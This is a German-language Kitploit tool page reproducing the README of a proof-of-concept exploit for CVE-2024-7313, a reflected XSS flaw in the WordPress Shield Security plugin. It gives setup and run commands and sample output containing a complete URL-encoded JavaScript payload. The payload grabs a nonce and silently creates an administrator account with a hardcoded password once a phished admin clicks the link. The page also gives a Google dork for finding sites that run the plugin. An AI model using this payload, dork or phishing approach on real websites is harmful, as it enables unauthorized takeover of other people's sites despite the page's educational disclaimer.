Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-7313 — Eigener Proof-of-Concept zu XSS für unbefugte Erstellung von Admin-Konten via WordPress Plugin Shield Security < 20.0.6 | Kitploit
Tools/GitHubGitHub/wayne-ker/cve-2024-7313
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubwayne-ker/cve-2024-7313

CVE-2024-7313

Eigener Proof-of-Concept zu XSS für unbefugte Erstellung von Admin-Konten via WordPress Plugin Shield Security < 20.0.6

Repository anzeigen
31vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Exploit für Sicherheitslücke im Shield Security Plugin (CVE-2024-7313)

Kali Linux Works on My Machine Sleep Deprivation

Übersicht

Dieses Repository enthält ein Python-PoC-Skript, das eine reflektierte XSS-Sicherheitslücke im Shield Security Plugin für WordPress ausnutzt, das Versionen unter 20.0.6 betrifft. Die Sicherheitslücke (CVE-2024-7313) ermöglicht es einem Angreifer, einen bösartigen, auf das Ziel zugeschnittenen Link zu erstellen. Wenn ein Administrator darauf klickt, erstellt der Exploit über XSS ein nicht autorisiertes Administratorkonto. Das Skript erkennt automatisch verwundbare Installationen und generiert einen Payload, um die Sicherheitslücke auszunutzen.

Informationen zur Sicherheitslücke

  • CVE: CVE-2024-7313
  • Plugin: Shield Security < 20.0.6
  • Schweregrad: Hoch
  • Betroffene Systeme: WordPress-Websites, die das Shield Security Plugin in Versionen < 20.0.6 verwenden
  • Angriffstyp: Reflektiertes Cross-Site Scripting (XSS)
  • Veröffentlichungsdatum: 7. August 2024
  • OWASP TOP-10: A7: Cross-Site Scripting (XSS)
  • Verwendung

    Voraussetzungen

    • Python 3.x
    • Bibliotheken requests und beautifulsoup4

    Installieren Sie die erforderlichen Bibliotheken mit:

    root@kitploit:~
    pip install requests beautifulsoup4
    

    Skript ausführen

    1. Klonen Sie das Repository:
    root@kitploit:~
    git clone https://github.com/Wayne-Ker/CVE-2024-7313.git
    cd CVE-2024-7313
    
    1. Führen Sie das Skript mit der Ziel-URL aus:
    root@kitploit:~
    python3 exploit.py <target_url>
    

    Beispiel:

    root@kitploit:~
    python3 exploit.py http://127.0.0.1
    

    Nach der Eingabe der erforderlichen Details für den neuen Admin-Benutzer (Benutzername, E-Mail, Vorname, Nachname) generiert das Skript eine Payload-URL. Sie können diese URL in Ihren Browser einfügen, um den reflektierten XSS-Angriff auszuführen, der einen neuen Admin-Benutzer auf der WordPress-Seite erstellt.

    1. Beispielausgabe:
    root@kitploit:~
    #############################################################################
    #                                                                           #
    #                                                                           #
    #   ______     _______     ____   ___ ____  _  _       _____ _____ _ _____  #
    #  / ___\ \   / | ____|   |___ \ / _ |___ \| || |     |___  |___ // | ___/  #
    # | |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ / /  |_ \| | |_ \  #
    # | |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____/ /  ___) | |___) | #
    #  \____|  \_/  |_____|   |_____|\___|_____|  |_|      /_/  |____/|_|____/  #
    #                                                                           #
    #    Shield Security Plugin Vulnerability (CVE-2024-7313)                   #
    #    Reflected XSS in WordPress Shield Security Plugin                      #
    #    Versions Affected: < 20.0.6                                            #
    #    Risk: High                                                             #
    #    Developed by: Wayne-Kerr                                              #
    #    Published: August 7, 2024                                              #
    ############################################################################# 
    Shield Security version is vulnerable. Let's continue.
    Enter username: fakename
    Enter email: [email protected]
    Enter first name: Haxor
    Enter last name: test
    
    Using hardcoded password: HaxorStrongAFPassword123!!
    
    Generated XSS Payload URL: http://127.0.0.1/wp-admin/admin.php?page=icwp-wpsf-plugin&nav=dashboard&nav_sub=%3Cscript%3Evar%20xhrNonce%20%3D%20new%20XMLHttpRequest%28%29%3B%20xhrNonce.open%28%27GET%27%2C%20%27/wp-admin/user-new.php%27%2C%20true%29%3B%20xhrNonce.onload%20%3D%20function%28%29%20%7B%20if%20%28xhrNonce.status%20%3D%3D%3D%20200%29%20%7B%20var%20nonce%20%3D%20xhrNonce.responseText.match%28/name%3D%22_wpnonce_create-user%22%20value%3D%22%28%5Ba-zA-Z0-9%5D%2B%29%22/%29%5B1%5D%3B%20var%20xhr%20%3D%20new%20XMLHttpRequest%28%29%3B%20xhr.open%28%27POST%27%2C%20%27/wp-admin/user-new.php%27%2C%20true%29%3B%20xhr.setRequestHeader%28%27Content-Type%27%2C%20%27application/x-www-form-urlencoded%27%29%3B%20xhr.setRequestHeader%28%27Referer%27%2C%20%27http%3A//127.0.0.1/wp-admin/user-new.php%27%29%3B%20xhr.setRequestHeader%28%27Origin%27%2C%20%27http%3A//127.0.0.1%27%29%3B%20var%20params%20%3D%20%27action%3Dcreateuser%26_wpnonce_create-user%3D%27%20%2B%20nonce%20%2B%20%27%26_wp_http_referer%3D%252Fwp-admin%252Fuser-new.php%26user_login%3Dnick%26email%3Dnick%2540test.com%26first_name%3Dnick%26last_name%3Dtest%26url%3Dtest%26pass1%3DHaxorStrongAFPassword123%2521%2521%26pass2%3DHaxorStrongAFPassword123%2521%2521%26role%3Dadministrator%26createuser%3DAdd%2BNew%2BUser%27%3B%20xhr.send%28params%29%3B%20xhr.onload%20%3D%20function%28%29%20%7B%20if%20%28xhr.status%20%3D%3D%20200%29%20%7B%20console.log%28%27Admin%20user%20created%20successfully%27%29%3B%20window.location.href%20%3D%20%27http%3A//127.0.0.1/wp-admin/admin.php%3Fpage%3Dicwp-wpsf-plugin%26nav%3Ddashboard%26nav_sub%3Doverview%27%3B%20%7D%20else%20%7B%20console.log%28%27Error%20occurred%3A%20%27%20%2B%20xhr.statusText%29%3B%20%7D%20%7D%3B%20%7D%20else%20%7B%20console.log%28%27Error%20fetching%20nonce%3A%20%27%20%2B%20xhrNonce.statusText%29%3B%20%7D%20%7D%3B%20xhrNonce.send%28%29%3B%3C/script%3E
    

    Nachdem Sie die generierte XSS-Payload-URL besucht haben, wird der Exploit ausgeführt und ein neuer Admin-Benutzer auf der Ziel-WordPress-Seite erstellt.

    Hilfe-Menü

    Sie können das Hilfe-Menü durch Ausführen von:

    root@kitploit:~
    python3 exploit.py -h
    

    Dork zum Auffinden verwundbarer Websites

    Um Websites zu identifizieren, die das verwundbare Plugin verwenden, können Sie den folgenden Dork nutzen:

    root@kitploit:~
    inurl:"/wp-content/plugins/wp-simple-firewall/"
    

    Dies hilft Ihnen, Websites zu finden, die das Shield Security Plugin installiert haben. Beachten Sie, dass die Versionsnummer nicht öffentlich sichtbar ist, daher kann manuelles Testen erforderlich sein.

    Funktionsweise

    • Das Skript prüft zunächst, ob die Ziel-WordPress-Installation eine verwundbare Version des Shield Security Plugins verwendet, indem es die Antwort von der wp-login.php-Seite untersucht.
    • Wenn die Plugin-Version verwundbar ist, generiert es einen reflektierten XSS-Payload, der bei Ausführung einen neuen Admin-Benutzer mit einem hartcodierten Passwort erstellt.
    • Der Payload wird so erstellt, dass er zunächst eine GET-Anfrage verwendet, um den für die Kontenerstellung verwendeten WordPress-Nonce dynamisch zu ermitteln, und dann diesen Nonce verwendet, um eine POST-Anfrage an den Benutzererstellungsendpunkt mit den im Skript angegebenen Details des neuen Benutzers zu senden.
    • Der Payload wird dann URL-kodiert und zur Verwendung im Angriff angezeigt.
    • Sobald der Link an einen Administrator der Website gesendet und angeklickt wird, wird auf der Website ein neuer Administrator-Benutzer mit den vom Skript analysierten Details erstellt. Dies geschieht alles im Hintergrund, wobei der phishende Administrator ohne Kenntnis des Exploits im Hintergrund zum Shield Security Dashboard weitergeleitet wird.

    Haftungsausschluss

    Dieses Tool dient nur zu Bildungszwecken und sollte nur in autorisierten Penetrationstest-Umgebungen verwendet werden. Unautorisierter Zugriff oder die Nutzung von Systemen, die Ihnen nicht gehören, ist illegal. Der Autor übernimmt keine Verantwortung für Missbrauch dieses Tools.

    Lizenz

    Dieses Projekt ist unter der MIT-Lizenz lizenziert.

    Tool herunterladen